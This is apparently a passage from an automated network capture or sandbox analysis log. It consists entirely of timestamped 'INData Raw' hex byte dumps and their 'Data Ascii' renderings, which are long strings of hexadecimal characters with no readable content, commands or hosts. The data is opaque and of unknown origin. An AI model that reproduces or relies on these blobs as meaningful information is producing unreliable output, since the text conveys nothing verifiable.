                                                                                                                            Data Ascii: 8554F3B423CFE462494D5D721270934ED1862A5FCED18627024653B4A42E8E460EB42CF9E76ACBE35093CE921734E797462DB640EF8ED9E254DA78818BADC1B3DC0C8BB2CA2C94C39CF29DCE9029F9D232EC471EAF9D2352A74963DFF66748D06238C50EB457E586A045B83DF7715900E593758B5558F992077F7DF85DF51EE
                                                                                                                            2022-10-03 14:03:31 UTC2215INData Raw: 38 34 30 43 33 41 39 32 30 36 31 39 44 32 31 38 44 43 34 42 35 37 30 44 31 32 32 33 33 39 34 32 34 38 37 44 37 41 41 32 39 30 39 42 42 38 41 38 37 37 43 30 43 46 42 45 35 43 44 36 30 42 35 30 31 30 37 34 45 37 36 45 34 37 43 35 34 43 37 35 39 42 34 41 36 43 41 35 32 33 45 30 34 45 43 41 43 34 35 30 31 34 44 30 34 37 43 43 30 41 43 30 45 30 30 44 31 32 39 41 37 41 42 44 39 34 44 31 35 39 32 32 34 32 39 39 36 44 36 36 45 44 30 39 33 36 32 41 31 39 33 35 46 32 33 36 36 34 39 34 43 41 43 35 34 39 35 44 32 33 39 44 34 34 39 42 34 45 46 41 35 31 31 35 44 45 34 38 35 33 36 42 39 41 32 41 37 32 34 37 44 33 31 33 30 36 34 34 37 33 46 44 33 45 34 45 44 33 38 41 36 45 41 38 44 44 44 34 43 42 35 41 34 35 43 41 31 43 44 30 37 33 42 33 37 34 33 36 41 41 38 31 31 43 45
                                                                                                                            Data Ascii: 840C3A920619D218DC4B570D12233942487D7AA2909BB8A877C0CFBE5CD60B501074E76E47C54C759B4A6CA523E04ECAC45014D047CC0AC0E00D129A7ABD94D1592242996D66ED09362A1935F2366494CAC5495D239D449B4EFA5115DE48536B9A2A7247D313064473FD3E4ED38A6EA8DDD4CB5A45CA1CD073B37436AA811CE
                                                                                                                            2022-10-03 14:03:31 UTC2231INData Raw: 34 39 37 32 38 39 45 35 45 44 32 46 36 30 32 39 41 41 42 31 46 33 41 45 43 39 44 32 34 44 35 43 30 36 45 44 32 31 37 38 35 38 32 35 30 36 30 43 42 45 43 38 33 30 35 37 43 43 31 38 36 33 37 42 39 45 41 34 38 45 39 36 42 37 32 34 38 46 31 46 46 41 31 46 34 30 39 34 32 41 46 36 39 42 43 35 38 45 31 34 38 35 32 37 39 30 43 31 46 43 31 43 43 43 32 31 45 37 30 30 36 35 43 33 36 30 33 32 43 33 45 45 46 30 31 43 34 36 37 30 31 36 35 45 33 35 34 33 38 45 33 46 32 32 34 44 34 32 33 44 37 34 31 34 38 30 34 32 43 44 34 30 42 37 44 33 35 34 33 38 43 31 45 41 30 44 42 45 43 36 32 46 39 33 44 35 34 32 32 42 37 41 30 41 34 30 32 31 33 35 34 30 42 37 46 37 35 34 33 38 41 36 41 38 37 38 46 32 44 36 42 32 34 39 30 41 43 42 37 39 30 35 45 31 36 34 37 35 35 30 38 30 44 45 38
                                                                                                                            Data Ascii: 497289E5ED2F6029AAB1F3AEC9D24D5C06ED21785825060CBEC83057CC18637B9EA48E96B7248F1FFA1F40942AF69BC58E14852790C1FC1CCC21E70065C36032C3EEF01C4670165E35438E3F224D423D74148042CD40B7D35438C1EA0DBEC62F93D5422B7A0A40213540B7F75438A6A878F2D6B2490ACB7905E164755080DE8
                                                                                                                            2022-10-03 14:03:31 UTC2247INData Raw: 33 33 38 42 41 35 38 34 36 39 43 45 46 43 45 32 46 43 31 45 36 45 46 44 32 33 39 32 37 45 42 44 39 33 36 37 44 38 31 44 39 31 37 32 35 42 43 42 30 41 44 37 39 34 46 38 36 43 36 31 35 41 31 31 30 33 41 43 35 33 36 43 38 38 37 32 32 33 41 33 44 35 33 43 38 38 34 42 46 45 37 39 31 30 44 36 46 38 30 32 39 35 31 43 37 39 43 41 37 30 34 37 35 32 38 44 35 38 45 41 34 30 37 32 30 37 44 33 36 30 42 30 45 39 34 44 46 32 32 37 34 41 39 35 37 36 42 39 31 33 43 36 33 34 39 46 39 31 32 30 43 32 37 31 44 31 35 37 32 36 33 39 38 33 30 41 43 35 44 34 34 39 44 45 32 42 31 35 31 35 46 30 42 43 33 39 46 44 46 44 31 46 37 32 42 31 45 31 38 36 34 36 30 36 35 38 43 41 42 39 35 38 46 41 43 31 32 30 36 39 33 30 30 44 33 36 38 44 34 42 37 30 37 42 30 39 37 33 34 39 32 41 45 38 44
                                                                                                                            Data Ascii: 338BA58469CEFCE2FC1E6EFD23927EBD9367D81D91725BCB0AD794F86C615A1103AC536C887223A3D53C884BFE7910D6F802951C79CA7047528D58EA407207D360B0E94DF2274A9576B913C6349F9120C271D1572639830AC5D449DE2B1515F0BC39FDFD1F72B1E186460658CAB958FAC12069300D368D4B707B0973492AE8D
                                                                                                                            2022-10-03 14:03:31 UTC2263INData Raw: 32 30 44 36 32 38 32 30 43 36 35 37 34 43 44 39 37 45 36 44 31 45 36 30 43 35 32 45 42 46 31 46 37 46 32 44 42 33 32 43 45 34 43 38 30 43 35 43 45 39 46 37 44 31 39 37 45 33 39 33 39 41 31 34 43 41 42 46 33 34 31 46 31 43 44 30 38 31 37 30 37 41 30 44 32 30 31 39 32 38 46 37 42 31 39 39 36 38 35 42 36 35 46 41 45 36 44 42 44 34 43 30 39 36 30 39 41 35 39 36 45 35 46 32 45 39 31 38 45 33 41 46 32 39 31 33 37 35 42 36 31 37 46 31 44 33 46 32 43 30 45 37 37 43 45 42 35 41 43 32 45 32 36 44 37 38 36 45 41 39 32 45 42 30 42 32 34 34 30 45 43 36 36 33 37 36 30 35 45 34 37 33 33 31 42 44 31 32 46 45 34 36 38 45 32 36 43 44 33 31 41 46 43 30 39 46 39 36 44 39 31 36 37 30 38 31 37 41 32 31 37 37 31 38 45 44 34 45 36 33 37 35 35 33 31 34 46 41 33 37 35 34 32 36 35
                                                                                                                            Data Ascii: 20D62820C6574CD97E6D1E60C52EBF1F7F2DB32CE4C80C5CE9F7D197E3939A14CABF341F1CD081707A0D201928F7B199685B65FAE6DBD4C09609A596E5F2E918E3AF291375B617F1D3F2C0E77CEB5AC2E26D786EA92EB0B2440EC6637605E47331BD12FE468E26CD31AFC09F96D91670817A217718ED4E63755314FA3754265
                                                                                                                            2022-10-03 14:03:31 UTC2279INData Raw: 32 44 35 35 39 30 43 46 33 33 44 41 44 34 36 31 36 32 35 38 32 30 35 35 32 30 35 37 41 30 35 45 43 39 31 41 34 36 43 37 38 39 32 42 36 42 43 43 43 42 37 39 33 44 31 44 37 39 33 43 31 31 46 38 41 32 34 32 46 31 46 42 35 33 41 44 42 43 36 38 42 30 32 38 34 42 37 39 41 37 31 30 45 31 46 35 45 39 41 34 43 34 46 41 33 37 36 38 35 30 45 32 34 35 43 37 34 43 43 42 33 31 35 31 33 35 43 36 45 35 32 36 45 35 37 43 33 34 36 39 34 39 42 41 32 46 32 32 30 43 38 38 32 39 46 44 38 37 35 31 30 46 37 43 35 31 38 30 45 33 35 30 30 33 30 31 41 34 43 33 35 38 36 30 37 36 38 38 39 46 33 35 33 30 44 35 33 35 36 34 37 35 38 42 39 46 35 46 41 39 38 41 32 36 41 38 32 42 38 38 33 35 45 37 46 35 37 31 31 37 32 41 45 30 33 38 46 39 39 39 45 31 41 46 32 36 39 45 34 44 33 33 32 38 30
                                                                                                                            Data Ascii: 2D5590CF33DAD461625820552057A05EC91A46C7892B6BCCCB793D1D793C11F8A242F1FB53ADBC68B0284B79A710E1F5E9A4C4FA376850E245C74CCB315135C6E526E57C346949BA2F220C8829FD87510F7C5180E3500301A4C3586076889F3530D53564758B9F5FA98A26A82B8835E7F571172AE038F999E1AF269E4D33280
                                                                                                                            2022-10-03 14:03:31 UTC2295INData Raw: 41 30 31 42 31 42 42 34 33 36 41 30 30 30 44 39 39 35 33 34 34 32 35 43 37 43 36 46 34 30 30 37 35 34 37 37 37 32 34 34 42 38 39 36 33 46 36 30 38 30 37 36 43 34 35 34 39 31 31 36 38 31 38 39 35 34 38 36 32 34 32 35 44 35 44 44 31 43 44 41 46 37 31 35 31 44 31 43 44 38 45 31 38 30 39 39 35 36 46 38 33 36 36 42 44 44 42 36 37 32 34 38 31 30 32 39 37 38 33 37 35 37 33 33 43 46 34 46 39 43 39 31 39 34 45 32 33 46 46 43 43 44 44 34 45 32 36 41 32 38 42 35 36 39 34 30 45 33 45 41 32 46 45 35 45 33 36 31 33 34 36 35 45 36 43 46 33 38 32 45 39 30 42 35 41 39 39 31 46 39 44 36 33 39 41 42 44 46 38 34 43 39 32 44 42 37 33 35 37 35 43 46 31 36 43 43 43 45 45 37 32 44 42 39 41 45 36 45 37 39 32 35 35 42 34 46 30 38 32 36 45 39 44 41 30 38 31 45 43 33 42 42 42 31 45
                                                                                                                            Data Ascii: A01B1BB436A000D99534425C7C6F400754777244B8963F608076C4549116818954862425D5DD1CDAF7151D1CD8E1809956F8366BDDB67248102978375733CF4F9C9194E23FFCCDD4E26A28B56940E3EA2FE5E3613465E6CF382E90B5A991F9D639ABDF84C92DB73575CF16CCCEE72DB9AE6E79255B4F0826E9DA081EC3BBB1E
                                                                                                                            2022-10-03 14:03:31 UTC2311INData Raw: 41 45 34 46 44 41 35 32 35 45 33 39 34 31 38 34 42 42 31 42 37 36 39 34 33 31 39 30 43 39 36 33 45 34 37 43 41 43 41 30 45 42 32 34 34 45 42 36 39 37 37 37 42 42 39 39 43 37 45 38 32 33 33 36 39 33 36 30 45 46 36 37 44 36 45 43 33 33 39 31 37 46 33 44 32 46 35 30 33 36 32 42 45 32 41 37 45 45 44 41 30 42 46 44 31 42 39 38 34 32 36 30 34 35 45 36 46 41 35 45 44 46 36 38 30 42 31 44 35 32 39 32 45 30 46 34 31 42 32 45 31 43 38 36 33 41 35 42 31 38 44 45 32 45 42 31 32 35 44 35 36 38 44 39 39 32 31 35 43 35 43 32 37 37 42 30 44 42 30 39 34 32 45 32 30 46 31 39 33 34 30 43 42 46 31 41 33 45 41 31 34 43 38 43 43 42 37 39 34 43 36 36 35 30 42 43 31 39 44 45 36 46 33 38 44 39 46 32 37 34 37 46 42 31 36 30 43 30 32 42 45 39 31 41 34 45 38 38 35 45 31 31 46 34 38
                                                                                                                            Data Ascii: AE4FDA525E394184BB1B76943190C963E47CACA0EB244EB69777BB99C7E823369360EF67D6EC33917F3D2F50362BE2A7EEDA0BFD1B98426045E6FA5EDF680B1D5292E0F41B2E1C863A5B18DE2EB125D568D99215C5C277B0DB0942E20F19340CBF1A3EA14C8CCB794C6650BC19DE6F38D9F2747FB160C02BE91A4E885E11F48
                                                                                                                            2022-10-03 14:03:31 UTC2327INData Raw: 32 37 31 35 35 44 36 44 39 38 30 44 34 33 38 37 32 39 44 36 46 41 43 33 39 33 46 34 38 44 31 41 45 44 31 34 42 31 34 38 37 41 39 31 35 37 39 35 35 44 36 44 45 46 45 31 46 43 45 34 44 44 39 31 36 36 44 46 43 33 42 35 35 41 33 35 35 42 42 33 33 42 33 34 33 32 46 38 33 46 46 36 43 36 44 45 31 37 37 38 34 37 37 31 41 31 38 37 36 38 45 35 31 43 44 44 45 32 39 41 33 34 39 46 39 31 44 35 46 41 34 32 45 39 41 33 37 35 39 41 39 41 33 37 45 45 43 38 31 32 36 34 36 30 45 32 41 39 37 36 43 42 33 36 32 38 45 42 45 45 38 34 46 33 36 39 37 33 32 44 32 43 46 38 36 46 46 45 39 37 38 39 39 44 31 39 42 38 32 46 35 44 42 33 46 36 30 39 43 30 32 39 34 33 33 42 41 43 42 35 35 39 36 36 35 33 35 44 34 43 42 43 44 39 35 41 32 36 35 30 45 38 44 30 38 37 43 43 35 44 42 39 44 30 39
                                                                                                                            Data Ascii: 27155D6D980D438729D6FAC393F48D1AED14B1487A9157955D6DEFE1FCE4DD9166DFC3B55A355BB33B3432F83FF6C6DE17784771A18768E51CDDE29A349F91D5FA42E9A3759A9A37EEC8126460E2A976CB3628EBEE84F369732D2CF86FFE97899D19B82F5DB3F609C029433BACB55966535D4CBCD95A2650E8D087CC5DB9D09
                                                                                                                            2022-10-03 14:03:31 UTC2343INData Raw: 39 32 34 34 34 34 41 43 34 39 38 43 42 43 35 41 38 30 34 41 31 43 43 41 32 41 46 44 36 41 41 39 39 33 30 43 30 39 45 45 33 35 43 32 37 43 30 42 33 39 30 42 32 44 31 39 30 46 45 38 42 34 35 43 42 46 31 42 37 42 37 38 35 44 31 38 31 34 43 34 41 42 42 45 41 43 34 46 33 44 35 42 42 39 42 37 42 41 44 41 42 44 44 36 34 42 46 39 30 39 42 42 41 42 34 33 43 38 31 36 46 31 35 38 30 45 39 34 36 45 31 45 46 37 36 32 44 39 35 30 39 36 37 35 35 30 35 32 33 43 33 36 44 32 38 45 41 33 30 41 44 36 41 38 37 32 38 33 46 36 33 36 42 42 38 41 33 38 32 37 36 36 44 34 32 42 45 42 36 45 30 39 43 45 32 34 30 46 46 35 42 46 41 31 33 46 31 42 37 45 35 43 31 35 35 39 41 32 43 31 37 36 44 30 39 32 39 42 34 30 39 38 34 33 31 43 30 39 34 33 37 35 35 44 41 35 30 30 31 44 43 42 38 32 30
                                                                                                                            Data Ascii: 924444AC498CBC5A804A1CCA2AFD6AA9930C09EE35C27C0B390B2D190FE8B45CBF1B7B785D1814C4ABBEAC4F3D5BB9B7BADABDD64BF909BBAB43C816F1580E946E1EF762D950967550523C36D28EA30AD6A87283F636BB8A382766D42BEB6E09CE240FF5BFA13F1B7E5C1559A2C176D0929B4098431C0943755DA5001DCB820
                                                                                                                            2022-10-03 14:03:31 UTC2359INData Raw: 42 44 33 36 33 38 42 35 39 45 30 43 43 44 44 38 38 38 45 39 42 31 31 31 43 36 33 45 41 39 38 36 32 44 45 30 39 31 33 36 39 36 31 44 31 44 43 39 36 30 39 38 34 30 39 38 33 46 30 38 30 45 31 33 42 44 43 34 44 38 32 37 41 39 32 34 34 44 42 32 42 31 42 41 32 42 34 36 39 41 34 31 35 37 37 39 38 44 35 46 44 31 41 44 33 42 31 32 32 44 43 42 34 46 37 33 32 33 36 36 36 32 30 34 35 36 38 31 30 43 41 33 43 41 30 39 43 41 30 43 35 38 30 42 32 38 34 33 32 39 32 35 31 35 37 32 33 45 42 41 31 33 41 44 41 31 37 32 30 37 33 46 36 38 30 34 41 35 43 46 45 42 38 42 43 39 35 44 38 33 38 43 30 43 43 42 39 46 44 35 38 36 33 33 39 41 34 41 46 33 30 34 46 35 44 35 45 30 43 33 30 34 44 35 44 42 44 41 33 42 38 34 31 46 34 43 46 31 46 43 31 39 46 38 44 30 32 30 37 37 35 35 33 39 35
                                                                                                                            Data Ascii: BD3638B59E0CCDD888E9B111C63EA9862DE09136961D1DC9609840983F080E13BDC4D827A9244DB2B1BA2B469A4157798D5FD1AD3B122DCB4F732366620456810CA3CA09CA0C580B2843292515723EBA13ADA172073F6804A5CFEB8BC95D838C0CCB9FD586339A4AF304F5D5E0C304D5DBDA3B841F4CF1FC19F8D0207755395
                                                                                                                            2022-10-03 14:03:31 UTC2375INData Raw: 46 38 33 37 44 42 44 31 42 37 36 32 31 39 41 43 42 44 35 33 42 42 39 44 34 33 39 32 31 42 32 38 36 44 31 37 33 35 39 44 43 45 45 31 30 37 34 41 38 43 32 42 38 41 44 35 41 36 36 31 35 43 42 43 36 44 32 30 33 33 44 41 41 41 44 39 33 38 46 44 46 46 31 46 32 42 33 42 33 42 34 30 38 36 32 37 37 31 45 41 32 46 31 45 42 39 38 33 30 44 42 33 36 41 43 31 35 43 39 42 32 30 45 36 45 42 35 38 39 44 43 36 41 30 46 44 41 30 41 38 43 33 38 42 37 36 30 31 44 36 41 30 31 37 35 42 36 36 44 36 36 41 30 35 43 38 39 44 35 46 35 34 44 37 38 41 43 38 46 45 36 35 35 44 46 39 33 46 41 43 34 31 33 30 39 34 38 44 33 31 30 43 34 46 45 41 43 44 33 35 44 43 30 41 38 38 46 32 43 43 35 44 46 44 35 37 45 32 33 35 33 31 39 43 31 43 42 46 35 32 42 34 34 44 43 32 41 33 33 35 34 43 35 31 44
                                                                                                                            Data Ascii: F837DBD1B76219ACBD53BB9D43921B286D17359DCEE1074A8C2B8AD5A6615CBC6D2033DAAAD938FDFF1F2B3B3B40862771EA2F1EB9830DB36AC15C9B20E6EB589DC6A0FDA0A8C38B7601D6A0175B66D66A05C89D5F54D78AC8FE655DF93FAC4130948D310C4FEACD35DC0A88F2CC5DFD57E235319C1CBF52B44DC2A3354C51D
                                                                                                                            2022-10-03 14:03:31 UTC2391INData Raw: 36 32 41 37 34 42 45 37 36 46 45 45 46 30 34 30 33 37 37 43 38 33 37 37 43 33 44 45 41 35 41 44 30 30 31 46 44 30 34 33 35 43 33 34 31 44 33 30 38 37 42 31 35 43 41 30 41 32 41 32 38 39 46 41 45 43 35 39 30 42 36 33 42 46 36 30 37 37 37 38 34 34 30 35 33 44 30 43 46 35 35 39 30 32 30 36 35 43 41 30 46 36 38 42 41 41 39 34 35 44 43 34 44 38 42 41 30 33 45 44 38 42 42 39 44 42 31 37 34 32 46 46 38 44 45 32 45 41 42 31 32 31 36 30 41 34 43 32 42 43 36 44 44 41 35 42 45 39 42 32 46 46 30 37 31 37 37 36 45 44 39 31 42 43 43 41 46 44 33 31 43 34 43 32 31 39 32 31 45 44 35 33 34 34 38 41 32 33 37 30 41 44 35 44 45 34 30 42 33 43 34 34 37 32 33 46 37 31 30 45 46 30 32 39 46 36 32 43 35 46 43 39 43 34 41 46 43 46 43 30 42 33 33 38 43 32 35 33 33 33 38 44 41 34 34
                                                                                                                            Data Ascii: 62A74BE76FEEF040377C8377C3DEA5AD001FD0435C341D3087B15CA0A2A289FAEC590B63BF60777844053D0CF55902065CA0F68BAA945DC4D8BA03ED8BB9DB1742FF8DE2EAB12160A4C2BC6DDA5BE9B2FF071776ED91BCCAFD31C4C21921ED53448A2370AD5DE40B3C44723F710EF029F62C5FC9C4AFCFC0B338C253338DA44
                                                                                                                            2022-10-03 14:03:31 UTC2407INData Raw: 33 42 30 45 36 36 42 34 33 43 43 44 36 41 35 43 45 43 34 45 36 41 30 41 31 36 44 30 35 43 41 39 36 35 35 32 35 36 30 36 37 38 34 33 44 35 42 34 43 44 30 34 39 34 46 41 35 32 42 36 34 31 35 37 37 32 46 37 31 31 34 45 41 46 42 35 35 31 30 42 44 46 33 46 32 43 36 39 46 44 38 31 44 43 32 41 32 36 37 31 45 46 42 45 33 31 38 38 35 45 34 39 41 32 32 43 43 34 31 41 36 45 33 37 31 41 38 42 31 37 46 30 32 43 41 43 45 32 39 30 38 44 32 36 43 43 35 42 43 44 44 39 36 42 37 39 38 42 37 44 44 32 42 31 35 44 44 43 43 38 37 46 32 33 39 37 34 46 30 36 41 33 35 46 36 34 38 38 37 34 46 46 34 37 46 35 41 33 38 38 39 43 42 34 33 31 31 46 43 36 32 43 44 41 38 32 36 45 41 42 30 43 41 38 37 37 34 33 38 45 42 34 37 39 44 31 39 32 43 35 45 36 34 31 36 46 44 35 30 45 31 37 37 32 44
                                                                                                                            Data Ascii: 3B0E66B43CCD6A5CEC4E6A0A16D05CA9655256067843D5B4CD0494FA52B6415772F7114EAFB5510BDF3F2C69FD81DC2A2671EFBE31885E49A22CC41A6E371A8B17F02CACE2908D26CC5BCDD96B798B7DD2B15DDCC87F23974F06A35F648874FF47F5A3889CB4311FC62CDA826EAB0CA877438EB479D192C5E6416FD50E1772D
                                                                                                                            2022-10-03 14:03:31 UTC2423INData Raw: 45 32 42 33 33 34 39 38 31 32 30 36 30 37 41 42 46 31 41 30 36 39 46 39 42 31 31 43 43 42 39 46 39 38 32 35 43 46 43 43 36 37 33 35 43 36 36 39 41 38 33 38 43 33 43 33 35 39 37 36 46 36 37 30 30 30 44 46 33 44 44 36 43 41 39 43 31 45 31 33 45 33 36 39 31 42 30 42 33 39 35 38 43 35 33 41 45 30 32 45 32 45 37 45 45 37 33 35 34 32 39 41 30 33 36 35 36 39 38 38 30 36 32 35 30 35 46 36 33 46 34 45 32 45 32 42 35 45 46 31 41 42 43 30 35 32 45 30 36 35 31 35 41 33 38 35 45 37 35 31 42 33 41 35 41 32 30 32 35 39 38 39 36 38 42 39 38 32 32 30 44 42 45 30 42 31 37 35 43 31 43 39 39 45 30 45 30 41 42 41 35 32 30 35 30 44 38 30 30 45 37 34 42 39 37 30 30 44 35 41 32 33 31 41 37 33 39 38 42 42 37 41 35 45 30 30 45 35 39 41 35 37 45 37 41 44 35 45 33 31 45 34 38 34 34
                                                                                                                            Data Ascii: E2B33498120607ABF1A069F9B11CCB9F9825CFCC6735C669A838C3C35976F67000DF3DD6CA9C1E13E3691B0B3958C53AE02E2E7EE735429A03656988062505F63F4E2E2B5EF1ABC052E06515A385E751B3A5A202598968B98220DBE0B175C1C99E0E0ABA52050D800E74B9700D5A231A7398BB7A5E00E59A57E7AD5E31E4844
                                                                                                                            2022-10-03 14:03:31 UTC2439INData Raw: 36 31 39 30 44 43 32 33 37 31 31 37 37 30 45 32 35 31 38 46 33 35 45 41 31 41 31 36 45 32 32 39 42 44 46 39 34 46 41 42 35 30 44 36 34 46 30 38 42 32 31 43 41 39 32 43 45 39 36 42 39 33 39 39 36 31 36 46 37 36 31 30 41 35 44 35 41 43 41 45 31 41 43 43 43 43 33 34 32 36 46 42 41 33 34 43 43 34 38 46 31 45 35 46 38 41 42 34 45 33 39 34 39 45 36 44 36 32 46 41 44 41 30 30 46 37 32 45 33 39 46 42 43 42 34 34 32 44 30 46 42 33 31 34 30 44 35 42 46 36 43 41 44 39 38 36 34 42 37 36 39 31 44 45 45 30 43 42 34 44 44 43 34 36 42 37 33 41 45 42 39 41 44 36 37 46 33 39 35 32 34 46 30 37 41 37 33 34 37 39 46 45 34 34 42 43 41 45 45 31 30 33 38 39 45 30 39 43 33 39 38 46 36 34 42 45 41 37 34 44 30 43 33 44 42 43 35 42 42 32 44 34 36 46 46 33 34 38 41 41 42 36 44 30 41
                                                                                                                            Data Ascii: 6190DC23711770E2518F35EA1A16E229BDF94FAB50D64F08B21CA92CE96B9399616F7610A5D5ACAE1ACCCC3426FBA34CC48F1E5F8AB4E3949E6D62FADA00F72E39FBCB442D0FB3140D5BF6CAD9864B7691DEE0CB4DDC46B73AEB9AD67F39524F07A73479FE44BCAEE10389E09C398F64BEA74D0C3DBC5BB2D46FF348AAB6D0A
                                                                                                                            2022-10-03 14:03:31 UTC2455INData Raw: 38 42 31 45 45 31 39 35 33 42 38 39 32 30 33 36 36 36 45 44 37 36 39 32 36 45 35 30 42 44 34 32 45 32 32 39 31 45 33 35 41 32 46 39 32 34 34 41 34 42 41 41 46 36 31 38 33 33 36 30 38 33 34 35 32 45 41 45 32 34 43 46 37 44 32 45 32 44 31 41 43 41 39 32 31 43 41 41 43 36 43 32 45 34 38 31 41 43 41 36 42 34 31 32 42 34 32 46 31 42 34 42 34 43 43 30 39 42 33 44 41 32 35 38 44 38 46 38 37 36 43 35 46 37 34 33 45 41 36 39 44 44 31 33 35 43 37 38 33 35 44 38 41 38 44 36 30 42 31 35 39 38 42 41 34 43 41 33 34 30 35 37 33 35 42 38 41 38 42 44 37 31 36 38 43 36 44 38 46 31 31 43 45 41 35 33 42 31 30 39 38 44 44 41 41 37 36 33 31 42 39 42 44 41 32 30 43 35 33 31 33 45 38 34 34 30 34 42 33 33 37 42 42 31 33 37 31 45 36 34 43 33 45 45 35 41 31 44 33 32 31 32 38 45 32
                                                                                                                            Data Ascii: 8B1EE1953B89203666ED76926E50BD42E2291E35A2F9244A4BAAF618336083452EAE24CF7D2E2D1ACA921CAAC6C2E481ACA6B412B42F1B4B4CC09B3DA258D8F876C5F743EA69DD135C7835D8A8D60B1598BA4CA3405735B8A8BD7168C6D8F11CEA53B1098DDAA7631B9BDA20C5313E84404B337BB1371E64C3EE5A1D32128E2
                                                                                                                            2022-10-03 14:03:31 UTC2471INData Raw: 43 32 42 33 35 39 46 30 39 37 34 45 46 30 39 38 43 30 39 38 33 32 38 45 32 36 41 42 33 44 33 43 41 37 42 30 35 41 31 35 45 37 30 32 39 30 32 44 31 46 34 46 44 30 37 41 30 35 41 36 39 41 32 31 31 34 41 43 34 32 34 34 45 32 32 44 37 44 32 44 36 34 34 37 39 36 42 43 36 36 34 38 42 32 32 44 39 31 36 35 31 33 38 34 46 34 41 46 43 38 37 34 46 41 32 32 44 41 44 33 30 39 32 31 41 34 38 42 32 39 35 32 32 43 38 38 45 34 35 39 37 30 43 31 31 37 43 30 38 43 46 37 33 41 36 31 41 32 35 39 34 34 35 41 41 45 36 32 41 35 35 44 32 36 35 37 35 38 41 46 44 35 46 44 45 41 39 38 35 33 31 36 44 42 35 39 31 33 33 42 45 33 32 35 42 33 44 38 43 35 33 43 31 34 30 35 39 31 31 44 42 39 33 42 41 35 31 43 35 42 39 34 38 44 34 45 31 36 46 38 46 31 44 45 46 41 38 46 33 41 32 42 33 31 42
                                                                                                                            Data Ascii: C2B359F0974EF098C098328E26AB3D3CA7B05A15E702902D1F4FD07A05A69A2114AC4244E22D7D2D644796BC6648B22D91651384F4AFC874FA22DAD30921A48B29522C88E45970C117C08CF73A61A259445AAE62A55D265758AFD5FDEA985316DB59133BE325B3D8C53C1405911DB93BA51C5B948D4E16F8F1DEFA8F3A2B31B
                                                                                                                            2022-10-03 14:03:31 UTC2487INData Raw: 36 45 46 41 34 35 38 44 46 30 41 45 34 44 38 30 46 37 33 36 41 39 46 34 33 37 32 32 30 43 30 32 33 33 32 41 39 45 46 31 33 39 39 35 38 38 36 45 41 34 34 43 37 42 35 39 46 34 38 31 35 43 39 39 36 46 44 42 44 30 32 44 42 36 45 43 45 35 43 35 33 45 41 42 37 43 38 30 36 43 35 44 44 39 41 36 32 39 37 36 36 42 44 32 30 37 31 37 37 38 32 42 33 32 44 39 38 44 44 34 33 43 34 32 42 41 35 31 46 35 34 39 44 44 33 38 36 38 32 36 30 37 41 31 42 44 38 30 46 42 31 32 46 37 34 46 42 46 41 38 44 32 31 38 38 41 35 32 45 32 31 39 35 43 38 45 38 41 30 39 44 33 30 42 42 46 44 33 36 42 30 44 31 41 33 36 43 30 45 39 31 33 32 33 34 37 45 38 46 34 41 44 34 43 46 45 31 38 33 42 33 33 44 35 37 43 38 31 44 44 31 43 42 38 36 35 37 35 38 30 38 41 31 36 46 44 33 42 41 38 34 34 36 43 46
                                                                                                                            Data Ascii: 6EFA458DF0AE4D80F736A9F437220C02332A9EF13995886EA44C7B59F4815C996FDBD02DB6ECE5C53EAB7C806C5DD9A629766BD20717782B32D98DD43C42BA51F549DD38682607A1BD80FB12F74FBFA8D2188A52E2195C8E8A09D30BBFD36B0D1A36C0E9132347E8F4AD4CFE183B33D57C81DD1CB86575808A16FD3BA8446CF
                                                                                                                            2022-10-03 14:03:31 UTC2503INData Raw: 35 31 33 46 43 36 31 31 37 46 43 37 39 33 37 46 46 31 41 37 35 36 44 32 38 37 46 31 41 41 31 37 46 43 36 31 43 46 46 45 33 30 45 43 32 46 46 38 44 35 30 37 42 31 38 39 43 46 46 45 33 43 45 46 32 44 41 44 46 38 31 37 38 32 35 30 42 32 44 46 30 32 42 46 38 44 38 41 35 45 38 33 31 37 41 46 46 31 41 39 34 46 46 43 37 43 35 31 37 38 46 38 39 43 46 46 45 33 36 32 30 37 46 38 44 34 30 36 45 34 34 37 41 35 35 41 37 30 44 32 46 35 33 44 39 39 43 34 37 46 34 38 32 32 44 43 37 35 41 41 39 33 37 42 41 33 39 32 32 45 46 30 38 34 33 46 41 34 43 37 41 35 37 35 32 42 33 45 46 31 33 31 30 39 32 42 41 41 45 38 32 33 43 42 41 36 43 43 35 34 46 36 41 37 43 43 35 32 31 39 34 35 44 34 41 39 44 39 30 34 43 35 46 39 32 43 43 41 32 45 38 45 35 39 33 37 34 37 31 44 34 35 39 31 45
                                                                                                                            Data Ascii: 513FC6117FC7937FF1A756D287F1AA17FC61CFFE30EC2FF8D507B189CFFE3CEF2DADF8178250B2DF02BF8D8A5E8317AFF1A94FFC7C5178F89CFFE36207F8D406E447A55A70D2F53D99C47F4822DC75AA937BA3922EF0843FA4C7A5752B3EF131092BAAE823CBA6CC54F6A7CC521945D4A9D904C5F92CCA2E8E5937471D4591E
                                                                                                                            2022-10-03 14:03:31 UTC2519INData Raw: 42 45 39 32 41 33 38 41 44 35 44 38 37 43 42 32 37 41 46 31 33 42 44 45 32 44 35 43 41 39 36 39 42 32 41 33 44 36 44 42 41 41 32 30 42 35 31 36 36 35 34 34 33 37 31 41 35 34 34 39 33 41 36 41 35 34 33 34 32 33 44 35 34 36 34 32 36 43 36 36 44 43 46 31 33 43 36 43 42 41 30 31 37 31 32 32 30 38 41 37 33 31 32 44 30 35 36 35 32 39 32 32 32 35 33 30 39 37 30 45 39 42 34 34 36 36 46 35 43 35 33 33 42 41 31 43 44 37 33 37 30 35 44 39 42 30 31 33 43 37 45 30 33 37 43 31 31 33 36 31 42 38 36 46 42 36 46 30 44 46 35 32 31 31 37 45 46 30 31 41 39 35 32 32 36 31 38 37 34 45 42 37 37 31 42 43 35 42 37 35 33 42 37 32 43 39 45 30 31 30 45 34 42 38 30 45 38 44 35 30 38 37 34 39 30 31 46 36 37 31 33 30 45 39 35 36 44 35 36 34 35 32 45 39 41 43 43 42 41 41 35 39 32 38 45
                                                                                                                            Data Ascii: BE92A38AD5D87CB27AF13BDE2D5CA969B2A3D6DBAA20B5166544371A54493A6A543423D546426C66DCF13C6CBA01712208A7312D056529222530970E9B4466F5C533BA1CD73705D9B013C7E037C11361B86FB6F0DF52117EF01A952261874EB771BC5B753B72C9E010E4B80E8D50874901F67130E956D56452E9ACCBAA5928E
